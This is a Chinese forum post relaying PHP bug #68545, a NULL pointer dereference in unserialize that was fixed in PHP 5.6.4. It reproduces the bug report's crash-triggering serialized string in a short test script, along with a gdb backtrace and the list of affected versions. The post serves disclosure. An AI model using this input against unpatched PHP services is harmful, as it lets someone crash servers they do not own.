本帖最后由 s.Bo 于 2014-12-29 10:36 编辑
php Version 5.6.4 ChangeLog 中显示修复了一个漏洞
Fixed bug #68545 (NULL pointer dereference in unserialize.c).
https://bugs.php.net/bug.php?id=68545
Description:
------------
There's a NULL pointer deference issue in the var_push_dtor function in unserialize.c.
By running the test script, you'll get following segfault:
Program received signal SIGSEGV, Segmentation fault.
var_push_dtor (var_hashx=0x0, rval=0x7ffff7fdb858) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:62
62 var_entries *var_hash = (*var_hashx)->last_dtor;
According to 3v4l.org, it crashes on following versions(http://3v4l.org/BtYZg):
4.3.10 - 4.4.9, 5.0.3 - 5.6.3, php7@20140507 - 20141101:
Test script:
---------------
<?php
echo unserialize('a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"b22";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";s:3:"bar";');
?>
Expected result:
----------------
The interpreter shouldn't crash.
Actual result:
--------------
(gdb) bt
#0 var_push_dtor (var_hashx=0x0, rval=0x7ffff7fdb7d0) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:62
#1 0x00000000004481af in process_nested_data (p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x0, ht=0x7ffff7fdb700, elements=4, objprops=0, rval=<optimized out>)
at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:329
#2 0x0000000000fdc686 in php_var_unserialize (rval=<optimized out>, p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x0) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:815
#3 0x0000000000447436 in process_nested_data (p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x7fffffffab90, ht=0x7ffff7fdb678, elements=5, objprops=0, rval=<optimized out>)
at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:297
#4 0x0000000000fdc686 in php_var_unserialize (rval=<optimized out>, p=0x7fffffffab80, max=0x7ffff7fdccf7 "", var_hash=0x7fffffffab90) at /home/charlie/php-5.6.3/ext/standard/var_unserializer.c:815
#5 0x0000000000f9884a in zif_unserialize (ht=<optimized out>, return_value=0x7ffff7fda908, return_value_ptr=<optimized out>, this_ptr=<optimized out>, return_value_used=<optimized out>)
at /home/charlie/php-5.6.3/ext/standard/var.c:965
#6 0x000000000158cf5c in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7fa8110) at /home/charlie/php-5.6.3/Zend/zend_vm_execute.h:558
#7 0x0000000001483b1a in execute_ex (execute_data=0x7ffff7fa8110) at /home/charlie/php-5.6.3/Zend/zend_vm_execute.h:363
#8 0x00000000012824cd in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/charlie/php-5.6.3/Zend/zend.c:1344
#9 0x000000000105522a in php_execute_script (primary_file=0x7fffffffd1c0) at /home/charlie/php-5.6.3/main/main.c:2584
#10 0x000000000159a1ed in do_cli (argc=3, argv=0x22979a0) at /home/charlie/php-5.6.3/sapi/cli/php_cli.c:994
#11 0x000000000045052d in main (argc=3, argv=0x22979a0) at /home/charlie/php-5.6.3/sapi/cli/php_cli.c:1378
#12 0x00007ffff710976d in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6
#13 0x0000000000450601 in _start ()
漏洞报告中测试代码执行 unserialize时可以直接使php崩溃
- <?php
- echo unserialize('a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"b22";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";a:6:{a:6:{s:3:"322";s:3:"bar";s:3:"bar";s:3:"foo";s:3:"bar";s:3:"bar";');
受影响版本
PHP 5.0.*
PHP 5.2.*
PHP 5.3.*
PHP 5.4.*版本 < 5.4.36
PHP 5.5.*版本 < 5.5.20
PHP 5.6.*版本 < 5.6.4
|
|京ICP备2025130156号|
IP卡
狗仔卡
收藏
分享
淘帖
鲜花
鸡蛋
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡